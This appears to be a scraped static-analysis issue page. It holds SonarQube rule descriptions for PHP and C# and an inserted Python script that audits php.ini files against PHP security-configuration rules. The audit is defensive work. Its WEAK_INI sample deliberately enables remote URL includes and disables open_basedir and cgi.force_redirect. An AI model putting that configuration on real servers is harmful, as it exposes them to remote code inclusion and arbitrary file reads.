<\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n  echo(\"i = $i\");\n  $i++;\n  if ($i &lt; 10){\n    goto loop;\n  }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++){\n  echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n  <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/php.html by fixme
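The php.ini rules in the blob above (S3332 for session.cookie_lifetime, S3333 open_basedir, S3334 allow_url_fopen / allow_url_include, S3335 cgi.force_redirect, S3336 session.use_trans_sid, S3337 enable_dl, S3338 file_uploads) each state a condition on a configuration directive. The following is an added example, not code from this page or from the sonar-rules project: a small Python audit that parses a php.ini text and applies those conditions as the rule descriptions state them. The parser, the finding format, the lower-casing of directive names and both sample php.ini texts are this example's own; it assumes the Unix ':' separator for the open_basedir list, and it is an interpretation of the rule text, not the Sonar PHP plugin's own implementation.

```python
# Added example (not from the page or the sonar-rules project): a php.ini audit
# that encodes the checks the PHP configuration rules above describe (S3333,
# S3334, S3335, S3336, S3337, S3338 and the cookie-lifetime case of S3332).
import re
from typing import Dict, List, Optional, Tuple

Finding = Tuple[str, str]  # (Sonar rule key, message)


def _strip_comment(line: str) -> str:
    """Drop a trailing ';' comment, ignoring ';' inside double quotes."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quote = not in_quote
        elif ch == ";" and not in_quote:
            return line[:i]
    return line


def parse_ini(text: str) -> Dict[str, str]:
    """Directive -> value for the effective lines; later duplicates win, as in PHP."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line or line.startswith("[") or "=" not in line:
            continue  # blank, comment-only or [section] line
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        settings[key.strip().lower()] = value  # assumption: names compared case-insensitively
    return settings


def is_on(value: Optional[str]) -> Optional[bool]:
    """PHP's boolean reading of an ini value; None when the directive is absent."""
    if value is None:
        return None
    v = value.strip().lower()
    if v in ("on", "true", "yes"):
        return True
    m = re.match(r"[+-]?\d+", v)  # anything else reads like atoi(): "1" on, "off"/"abc" off
    return bool(int(m.group())) if m else False


def audit(settings: Dict[str, str]) -> List[Finding]:
    """Apply the rules' conditions to parsed settings and return the findings."""
    findings: List[Finding] = []
    # S3333: open_basedir must be set and must not list "/" or ".".
    # Assumes the Unix ':' list separator (Windows uses ';').
    basedir = settings.get("open_basedir")
    if basedir is None:
        findings.append(("php:S3333", "open_basedir is not set; any file can be read"))
    else:
        bad = [p for p in (e.strip() for e in basedir.split(":")) if p in ("/", ".")]
        if bad:
            findings.append(("php:S3333", "open_basedir lists %s, which voids the limit" % ", ".join(bad)))
    # Default On in PHP, so absence counts as enabled (S3334, S3337, S3338).
    for key, rule in (("allow_url_fopen", "php:S3334"), ("enable_dl", "php:S3337"),
                      ("file_uploads", "php:S3338")):
        if is_on(settings.get(key)) is not False:
            findings.append((rule, key + " is not explicitly disabled"))
    # Default Off, so only an explicit enable is reported (S3334, S3336).
    for key, rule in (("allow_url_include", "php:S3334"), ("session.use_trans_sid", "php:S3336")):
        if is_on(settings.get(key)):
            findings.append((rule, key + " is enabled"))
    # S3335: only an explicit cgi.force_redirect=0 is an issue.
    if is_on(settings.get("cgi.force_redirect")) is False:
        findings.append(("php:S3335", "cgi.force_redirect is explicitly disabled"))
    # S3332: a non-zero lifetime makes the session cookie persistent.
    lifetime = settings.get("session.cookie_lifetime")
    if lifetime is not None and lifetime.strip() != "0":
        findings.append(("php:S3332", "session.cookie_lifetime=%s makes the session cookie persistent" % lifetime))
    return findings


# Constructed samples: WEAK_INI reproduces the settings the rules flag,
# HARDENED_INI the values from their compliant solutions.
WEAK_INI = """\
; open_basedir="/var/www/app"   ; commented out, so no limit applies
allow_url_include = On          ; executable code can be pulled from URLs
cgi.force_redirect = 0
session.use_trans_sid = 1
file_uploads = On
session.cookie_lifetime = 86400
"""

HARDENED_INI = """\
open_basedir = "/var/www/app:/tmp"
allow_url_fopen = Off
allow_url_include = Off
cgi.force_redirect = 1
session.use_trans_sid = 0
enable_dl = Off
file_uploads = Off
session.cookie_lifetime = 0
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(parse_ini(ini)))
```

Run against WEAK_INI the audit reports eight findings (allow_url_fopen and enable_dl are reported although they never appear in the file, because their PHP defaults are On); HARDENED_INI produces none. The important design point is the asymmetry the rules themselves draw: directives that default to On must be disabled explicitly, while directives that default to Off are only a problem when someone turns them on, so the audit has to know the default of every directive it checks rather than treating "absent" as "safe".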

      BUG found
      Open

              window.data = {"total":94,"p":1,"ps":500,"rules":[{"key":"csharpsquid:S100","repo":"csharpsquid","name":"Methods and properties should be named in camel case","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks whether or not method and property names are camel cased. To\nreduce noise, two consecutive upper case characters are allowed unless they form the whole name. So, <code>MyXMethod<\/code> is compliant, but\n<code>XM<\/code> on its own is not.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic int doSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic int DoSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule ignores members in types that are marked with <code>ComImportAttribute<\/code> or <code>InterfaceTypeAttribute<\/code>. <code>extern<\/code>\nmethods are also excluded from the check. Furthermore, when the <code>'_'<\/code> character is found in a name, the camel casing is not enforced.<\/p>\n<pre>\nvoid My_method(){...} \/\/ valid\nvoid My_method_(){...} \/\/ invalid, leading and trailing underscores are reported\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S103","repo":"csharpsquid","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank1"],"langName":"C#","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1066","repo":"csharpsquid","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1)\n{\n  if (condition2)\n  {\n    ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif 
(condition1 &amp;&amp; condition2)\n{\n  ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1067","repo":"csharpsquid","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif (((condition1 &amp;&amp; condition2) || (condition3 &amp;&amp; condition4)) &amp;&amp; condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ((MyFirstCondition() || MySecondCondition()) &amp;&amp; MyLastCondition()) { ... }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S107","repo":"csharpsquid","name":"Methods should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\npublic void doSomething(int param1, int param2, int param3, string param4, long param5)\n{\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic void doSomething(int param1, int param2, int param3, string param4)\n{\n...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1104","repo":"csharpsquid","name":"Fields should not have public accessibility","htmlDesc":"<p>Public 
fields in public classes do not respect the encapsulation principle and have three main disadvantages:<\/p>\n<ul>\n  <li> Additional behavior such as validation cannot be added. <\/li>\n  <li> The internal representation is exposed, and cannot be changed afterwards. <\/li>\n  <li> Member values are subject to change from anywhere in the code and may not meet the programmer's assumptions. <\/li>\n<\/ul>\n<p>By using private fields and public properties (set and get), unauthorized modifications are prevented. Properties also benefit from additional\nprotection (security) features such as Link Demands.<\/p>\n<p>Note that due to optimizations on simple properties, public fields provide only very little performance gain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n    public int instanceData = 32; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n    private int instanceData = 32;\n\n    public int InstanceData\n    {\n        get { return instanceData; }\n        set { instanceData = value; }\n    }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Fields marked as <code>readonly<\/code> or <code>const<\/code> are ignored by this rule.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/493.html\">MITRE, CWE-493<\/a> - Critical Public Variable Without Final Modifier <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S1109","repo":"csharpsquid","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. 
This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n  doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition)\n{\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1125","repo":"csharpsquid","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanMethod() == true) { \/* ... *\/ }\nif (booleanMethod() == false) { \/* ... *\/ }\nif (booleanMethod() || false) { \/* ... *\/ }\ndoSomething(!false);\ndoSomething(booleanMethod() == true);\n\nbooleanVariable = booleanMethod() ? true : false;\nbooleanVariable = booleanMethod() ? true : exp;\nbooleanVariable = booleanMethod() ? false : exp;\nbooleanVariable = booleanMethod() ? exp : true;\nbooleanVariable = booleanMethod() ? exp : false;\n\nfor (var x = 0; true; x++)\n{\n ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanMethod()) { \/* ... *\/ }\nif (!booleanMethod()) { \/* ... *\/ }\nif (booleanMethod()) { \/* ... 
*\/ }\ndoSomething(true);\ndoSomething(booleanMethod());\n\nbooleanVariable = booleanMethod();\nbooleanVariable = booleanMethod() || exp;\nbooleanVariable = !booleanMethod() &amp;&amp; exp;\nbooleanVariable = !booleanMethod() || exp;\nbooleanVariable = booleanMethod() &amp;&amp; exp;\n\nfor (var x = 0; ; x++)\n{\n ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1135","repo":"csharpsquid","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate void DoSomething()\n{\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1144","repo":"csharpsquid","name":"Unused private types or members should be removed","htmlDesc":"<p><code>private<\/code> or <code>internal<\/code> types or <code>private<\/code> members that are never executed or referenced are dead code:\nunnecessary, inoperative code that should be removed. 
Cleaning out dead code decreases the size of the maintained codebase, making it easier to\nunderstand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n  private void UnusedPrivateMethod() {...} \/\/ Noncompliant\n\n  private class UnusedClass {...} \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n  private Foo()\n  {\n    UsedPrivateMethod();\n  }\n\n  private void UsedPrivateMethod()\n  {\n    var c = new UsedClass();\n  }\n\n  private class UsedClass {...}\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule doesn't raise any issue on:<\/p>\n<ul>\n  <li> Empty constructors <\/li>\n  <li> Attributed members <\/li>\n  <li> Empty serialization constructor on type with <code>System.SerializableAttribute<\/code> attribute. <\/li>\n  <li> Internals in assemblies that have a <code>System.Runtime.CompilerServices.InternalsVisibleToAttribute<\/code> attribute. <\/li>\n<\/ul>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1145","repo":"csharpsquid","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n  <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n  <li> Some value was left unset. <\/li>\n  <li> Some logic is not doing what the programmer thought it did. 
<\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true)\n{\n  DoSomething();\n}\n...\nif (false)\n{\n  DoSomethingElse();\n}\n\nif (2 &lt; 3 ) { ... }  \/\/ Noncompliant; always false\n\nint i = 0;\nint j = 0;\n\/\/ ...\nj = Foo();\n\nif (j &gt; 0 &amp;&amp; i &gt; 0) { ... }  \/\/ Noncompliant; always false - i never set after initialization\n\nbool b = true;\n\/\/...\nif (b || !b) { ... }  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nDoSomething();\n...\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated; use <a href='\/coding_rules#rule_key=csharpsquid%3AS2583'>S2583<\/a> instead.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1155","repo":"csharpsquid","name":"\"Any()\" should be used to test for emptiness","htmlDesc":"<p>Using <code>.Count()<\/code> to test for emptiness works, but using <code>.Any()<\/code> makes the intent clearer, and the code more readable.\nHowever, there are some cases where special attention should be paid:<\/p>\n<p>- if the collection is an <code>EntityFramework<\/code> or other ORM query, calling <code>.Count()<\/code> will cause executing a potentially massive\nSQL query and could put a large overhead on the application database. 
Calling <code>.Any()<\/code> will also connect to the database, but will generate\nmuch more efficient SQL.<\/p>\n<p>- if the collection is part of a LINQ query that contains <code>.Select()<\/code> statements that create objects, a large amount of memory could be\nunnecessarily allocated. Calling <code>.Any()<\/code> will be much more efficient because it will execute fewer iterations of the enumerable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate static bool HasContent(IEnumerable&lt;string&gt; strings)\n{\n  return strings.Count() &gt; 0;  \/\/ Noncompliant\n}\n\nprivate static bool HasContent2(IEnumerable&lt;string&gt; strings)\n{\n  return strings.Count() &gt;= 1;  \/\/ Noncompliant\n}\n\nprivate static bool IsEmpty(IEnumerable&lt;string&gt; strings)\n{\n  return strings.Count() == 0;  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate static bool HasContent(IEnumerable&lt;string&gt; strings)\n{\n  return strings.Any();\n}\n\nprivate static bool IsEmpty(IEnumerable&lt;string&gt; strings)\n{\n  return !strings.Any();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1163","repo":"csharpsquid","name":"Exceptions should not be thrown in finally blocks","htmlDesc":"<p>Throwing an exception from within a finally block will mask any exception which was previously thrown in the <code>try<\/code> or <code>catch<\/code>\nblock, and the masked exception's message and stack trace will be lost.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntry\n{\n  \/* some work which ends up throwing an exception *\/\n  throw new ArgumentException();\n}\nfinally\n{\n  \/* clean up *\/\n  throw new InvalidOperationException();       \/\/ Noncompliant; will mask the ArgumentException\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ntry\n{\n  \/* some work which ends up throwing an exception *\/\n  throw new ArgumentException();\n}\nfinally\n{\n  \/* clean up *\/                      
 \/\/ Compliant\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/soUbAQ\">CERT, ERR05-J.<\/a> - Do not let checked exceptions escape from a finally block\n  <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1172","repo":"csharpsquid","name":"Unused method parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the values passed to such parameters, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid DoSomething(int a, int b) \/\/ \"b\" is unused\n{\n  Compute(a);\n}\n\nvoid DoSomething2(int a) \/\/ value of \"a\" is unused\n{\n  a = 10;\n  Compute(a);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvoid DoSomething(int a)\n{\n  Compute(a);\n}\n\nvoid DoSomething2()\n{\n  var a = 10;\n  Compute(a);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p><code>virtual<\/code>, <code>override<\/code> methods and interface implementations are ignored. 
<\/p>\n<pre>\noverride void DoSomething(int a, int b) \/\/ no issue reported on b\n{\n  Compute(a);\n}\n<\/pre>\n<p>Furthermore, the <code>this<\/code> parameter of extension methods is also ignored.<\/p>\n<pre>\npublic static class Extensions\n{\n  public static void MyHelper(this HtmlHelper helper) \/\/no issue reported here\n  {\n    \/\/ no use of helper here\n  }\n}\n<\/pre>\n<p>Methods that have attributes defined on them are ignored.<\/p>\n<pre>\npublic class MyDto\n{\n  public string Name { get; set; }\n\n  [OnDeserialized]\n  private void OnDeserialized(StreamingContext context)\n  {\n    \/\/ ...\n  }\n}\n<\/pre>\n<p>Empty or unsupported methods are ignored.<\/p>\n<pre>\npublic void DoSomething()\n{}\n\npublic void Call()\n{\n  throw new NotImplementedException();\n}\n<\/pre>\n<p>And obviously no issue is raised on the <code>static void Main(string[] args)<\/code> method<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n  <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1186","repo":"csharpsquid","name":"Methods should not be empty","htmlDesc":"<p>There are several reasons for a method not to have a method body:<\/p>\n<ul>\n  <li> It is an unintentional omission, and should be fixed. <\/li>\n  <li> It is not yet, or never will be, supported. In this case a <code>NotSupportedException<\/code> should be thrown. <\/li>\n  <li> The method is an intentionally-blank override. 
In this case a nested comment should explain the reason for the blank override. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic override void DoSomething()\n{\n}\n\npublic override void DoSomethingElse()\n{\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic override void DoSomething()\n{\n  \/\/ Do nothing because of X and Y.\n}\n\npublic override void DoSomethingElse()\n{\n  throw new NotSupportedException();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The following methods are ignored:<\/p>\n<ul>\n  <li> empty <code>virtual<\/code> methods, <\/li>\n  <li> empty methods that override an <code>abstract<\/code> method, <\/li>\n  <li> empty overrides in test assemblies. <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S121","repo":"csharpsquid","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n  ExecuteSomething();\n  CheckSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition)\n{\n  ExecuteSomething();\n  CheckSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... 
while or for statement shall be a compound statement <\/li>\n  <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1226","repo":"csharpsquid","name":"Method parameters and caught exceptions should not be reassigned","htmlDesc":"<p>While it is technically correct to assign to parameters from within method bodies, it is better to use temporary variables to store intermediate\nresults.<\/p>\n<p>This rule will typically detect cases where a constructor parameter is assigned to itself instead of a field of the same name, i.e. 
when\n<code>this<\/code> was forgotten.<\/p>\n<p>Allowing parameters to be assigned to also reduces the code readability as developers will not be able to know whether the original parameter or\nsome temporary variable is being accessed without going through the whole method.<\/p>\n<p>Moreover, some developers might also expect assignments of method parameters to be visible from callers, which is not the case and can confuse\nthem.<\/p>\n<p>All parameters should be treated as <code>readonly<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass\n{\n  public string name;\n\n  public MyClass(string name)\n  {\n    name = name;                    \/\/ Noncompliant - useless identity assignment\n  }\n\n  public int Add(int a, int b)\n  {\n    a = a + b;                      \/\/ Noncompliant\n\n    \/* additional logic *\/\n\n    return a;                       \/\/ Seems like the parameter is returned as is, what is the point?\n  }\n\n  public static void Main()\n  {\n    MyClass foo = new MyClass();\n    int a = 40;\n    int b = 2;\n    foo.Add(a, b);                  \/\/ Variable \"a\" will still hold 40 after this call\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass\n{\n  public string name;\n\n  public MyClass(string name)\n  {\n    this.name = name;               \/\/ Compliant\n  }\n\n  public int Add(int a, int b)\n  {\n    return a + b;                   \/\/ Compliant\n  }\n\n  public static void Main()\n  {\n    MyClass foo = new MyClass();\n    int a = 40;\n    int b = 2;\n    foo.Add(a, b);\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2012, 17.8 - A function parameter should not be modified <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1227","repo":"csharpsquid","name":"break statements should not be used except for switch cases","htmlDesc":"<p><code>break;<\/code> is an unstructured control flow statement which makes code harder to 
read.<\/p>\n<p>Ideally, every loop should have a single termination condition.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint i = 0;\nwhile (true)\n{\n  if (i == 10)\n  {\n    break;      \/\/ Noncompliant\n  }\n\n  Console.WriteLine(i);\n  i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint i = 0;\nwhile (i != 10) \/\/ Compliant\n{\n  Console.WriteLine(i);\n  i++;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1244","repo":"csharpsquid","name":"Floating point numbers should not be tested for equality","htmlDesc":"<p>Floating point math is imprecise because of the challenges of storing such values in a binary representation. Even worse, floating point math is\nnot associative; push a <code>float<\/code> or a <code>double<\/code> through a series of simple mathematical operations and the answer will be\ndifferent based on the order of those operations because of the rounding that takes place at each step.<\/p>\n<p>Even simple floating point assignments are not simple:<\/p>\n<pre>\nfloat f = 0.100000001f; \/\/ 0.1\ndouble d = 0.10000000000000001; \/\/ 0.1\n<\/pre>\n<p>(Results will vary based on compiler and compiler settings)<\/p>\n<p>Therefore, the use of the equality (<code>==<\/code>) and inequality (<code>!=<\/code>) operators on <code>float<\/code> or <code>double<\/code> values\nis almost always an error.<\/p>\n<p>This rule checks for the use of direct and indirect equality\/inequality tests on floats and doubles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfloat myNumber = 3.146f;\nif ( myNumber == 3.146f ) \/\/Noncompliant. 
Because of floating point imprecision, this comparison cannot be relied upon\n{\n  \/\/ ...\n}\n\nif (myNumber &lt;= 3.146f &amp;&amp; myNumber &gt;= 3.146f) \/\/ Noncompliant indirect equality test\n{\n  \/\/ ...\n}\n\nif (myNumber &lt; 4 || myNumber &gt; 4) \/\/ Noncompliant indirect inequality test\n{\n  \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.3 - Floating-point expressions shall not be tested for equality or inequality. <\/li>\n  <li> MISRA C++:2008, 6-2-2 - Floating-point expressions shall not be directly or indirectly tested for equality or inequality <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S125","repo":"csharpsquid","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n  <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n  <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n  <li> MISRA C:2012, Dir. 4.4 - Sections of code should 